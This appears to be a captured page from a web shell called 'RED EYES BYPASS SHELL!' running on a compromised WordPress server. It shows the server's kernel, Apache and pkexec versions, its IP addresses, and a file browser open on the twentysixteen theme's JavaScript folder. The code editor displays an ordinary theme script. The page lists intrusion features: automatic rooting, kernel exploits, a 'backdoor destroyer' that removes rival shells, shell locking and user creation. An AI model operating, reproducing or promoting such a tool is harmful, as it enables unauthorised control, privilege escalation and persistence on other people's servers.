Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
twentysixteen /
js /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
color-scheme-control.js
2.88
KB
-rwxr-xr-x
customize-preview.js
1.04
KB
-rwxr-xr-x
functions.js
7.15
KB
-rwxr-xr-x
html5.js
10.09
KB
-rwxr-xr-x
keyboard-image-navigation.js
527
B
-rwxr-xr-x
skip-link-focus-fix.js
810
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : keyboard-image-navigation.js
/** * Twenty Sixteen keyboard support for image navigation. */ ( function( $ ) { $( document ).on( 'keydown.twentysixteen', function( e ) { var url = false; // Left arrow key code. if ( 37 === e.which ) { url = $( '.nav-previous a' ).attr( 'href' ); // Right arrow key code. } else if ( 39 === e.which ) { url = $( '.nav-next a' ).attr( 'href' ); // Other key code. } else { return; } if ( url && ! $( 'textarea, input' ).is( ':focus' ) ) { window.location = url; } } ); } )( jQuery );
Close